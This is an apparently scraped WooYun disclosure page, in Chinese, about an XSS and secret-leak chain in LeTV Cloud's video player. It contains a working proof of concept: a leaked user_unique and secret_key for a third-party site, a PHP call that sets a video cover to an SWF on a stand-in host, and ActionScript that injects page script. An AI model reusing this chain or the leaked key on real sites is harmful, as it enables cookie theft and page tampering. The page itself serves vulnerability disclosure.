乐视云XSS指谁打谁 | wooyun-2015-0159012| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159012

漏洞标题：乐视云XSS指谁打谁

漏洞作者：黑魔ひめ

提交时间：2015-12-07 13:57

修复时间：2016-01-23 15:16

公开时间：2016-01-23 15:16

漏洞类型：XSS 跨站脚本攻击

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-07：细节已通知厂商并且等待厂商处理中
2015-12-10：厂商已经确认，细节仅向厂商公开
2015-12-20：细节向核心白帽子及相关领域专家公开
2015-12-30：细节向普通白帽子公开
2016-01-09：细节向实习白帽子公开
2016-01-23：细节向公众公开

简要描述：

这个XSS可以想打谁打谁。
证明那里给出用乐视打游民的方法。
这次审核不通过我就不提交了。

详细说明：

1.首先是XSS
在云点播后台可以修改视频封面
抓个包改为swf后缀的as3格式文件
云点播的flash由as3编写，封面下载后直接appendChild()显示，而未检查其类型，导致可以执行外部代码，或者是CVE-2015-5119之类的东西。
把恶意的视频贴到论坛里就可以收cookie了。
2.其次是敏感信息泄露
http://api.letvcloud.com/gpc.php?cf=html5&sign=signxxxxx&ver=2.1&format=jsonp&pver=H5_Vod_20151203_4.0.9&bver=chrome49.0.2578.0&uuid=0AF6ED13C6122083C2D9E3DBA5780EBB_0&page_url=http%3A%2F%2Fyuntv.letv.com%2Fbcloud.html%3Fvu%3Dd5669d8923%26uu%3Dcfd9191aeb%26auto_play%3D0%26gpcflag%3D1%26width%3D640%26height%3D360&uu=cfd9191aeb&vu=d5669d8923&pf=html5&spf=0&callback=letvcloud144941740179958
乐视云点播用户后台预览视频的时候下载的jsonp
这里泄露了用户的secret，uu
利用用户的secret，uu可以进行流量统计，修改视频描述，标题，暂停视屏等操作。
3.最后，未授权访问（？）
http://help.letvcloud.com/Wiki.jsp?page=ResourceDownload
这里可以下载到云点播的php版本sdk
里面可以加上这样一段代码

public function videoUpdatePic($video_id,$pic='')
{ 
$api = 'video.update'; 
$params['video_id'] = $video_id; 
if(!empty($pic)){ $params['init_pic'] = $pic;
 $params['img'] = $pic; } 
return self::httpCall($api, $params); 
}

这个function可以实现不登录后台的情况下修改视频封面。

漏洞证明：

攻击http://www.gamersky.com/news/201509/665108.shtml
这个页面
首先抓个包看一下视频id：15879069
其次通过2获得游民的uu和私钥
public $user_unique='cfd9191aeb';
public $secret_key='a8b27caefde043c5e51d53b65b2dce3f';
最后利用

<?php
require("LetvCloudV1.php"); 
$leApi = new LetvCloudV1();
echo $leApi->videoUpdatePic(15879069,'http://evil.evil.evil/xss.swf');
?>

as3代码

ExternalInterface.call("function xss(){$(\"#leshitvauto\").before(\"<img src='http://www.sudops.com/wp-content/uploads/2014/07/wooyun-logo.png'></img>\");$(\"#leshitvauto\").remove();}");

配合1、3
修改其封面
达到在页面内插入wooyunLogo的效果。

由于swf可以写任意js代码。所以窃取cookie，模拟点击，等等都轻而易举。

修复方案：

过滤

版权声明：转载请注明来源黑魔ひめ@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-12-10 16:46

厂商回复：

感谢关注乐视安全，此问题已联系业务部门马上进行整改。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159012

漏洞标题：乐视云XSS指谁打谁

相关厂商：乐视网

漏洞作者：黑魔ひめ

提交时间：2015-12-07 13:57

修复时间：2016-01-23 15:16

公开时间：2016-01-23 15:16

漏洞类型：XSS 跨站脚本攻击

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源黑魔ひめ@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159012

漏洞标题：乐视云XSS指谁打谁

相关厂商：乐视网

漏洞作者： 黑魔ひめ

提交时间：2015-12-07 13:57

修复时间：2016-01-23 15:16

公开时间：2016-01-23 15:16

漏洞类型：XSS 跨站脚本攻击

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0159012"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 黑魔ひめ@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：黑魔ひめ

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源黑魔ひめ@乌云